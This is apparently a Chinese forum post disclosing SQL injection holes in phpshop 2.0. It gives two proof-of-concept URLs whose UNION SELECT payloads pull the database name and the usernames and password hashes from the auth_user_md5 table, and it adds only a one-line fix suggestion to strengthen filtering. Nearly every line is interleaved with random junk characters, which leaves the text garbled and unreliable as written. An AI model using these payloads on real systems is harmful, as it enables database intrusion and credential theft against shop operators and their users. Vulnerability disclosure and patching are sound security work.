标题 : phpshop 2.0 SQL Injection Vulnerability: d" {; w E4 h3 I, e
. \! s. _$ `) D; x ]: X* N0 b作者 : By onestree6 @1 s# c0 q. w" g; ?3 N
下载地址 : http://code.google.com/p/phpshop/downloads/list- i4 N( V) ] u# e [1 z
测试地址: windows 7 / ubuntu
( h: m* U4 K6 Y
* R% Z: ]$ h* Y( H* r2 D; E. S7 @
# E0 |6 h1 q0 E5 OSQLi p0c:
2 G% @# @, W" Q% T & W+ n+ q: D8 G7 e2 s
==================
, q& V; F; }6 A2 r# [% T
5 x: }1 F$ w e7 r6 Z/ J b9 y( ^http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
9 W/ v' ~+ A! v. i# Y; zunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
5 s8 a% I* ?3 r _; S) N* Y
5 ^: l" L/ i( I: a, X- thttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
$ S, A( W+ s2 ? c/ |
+ g, c3 q+ t3 R, u% o修复:
~, l9 T' K# p& b" f. U; q$ ]加强过滤
* B, |- d2 }8 O+ A
6 V( u6 w4 _9 `, B" g0 E1 }- B
3 H g; J5 |* W |
发表于 2013-1-18 18:24:10
收藏
支持
反对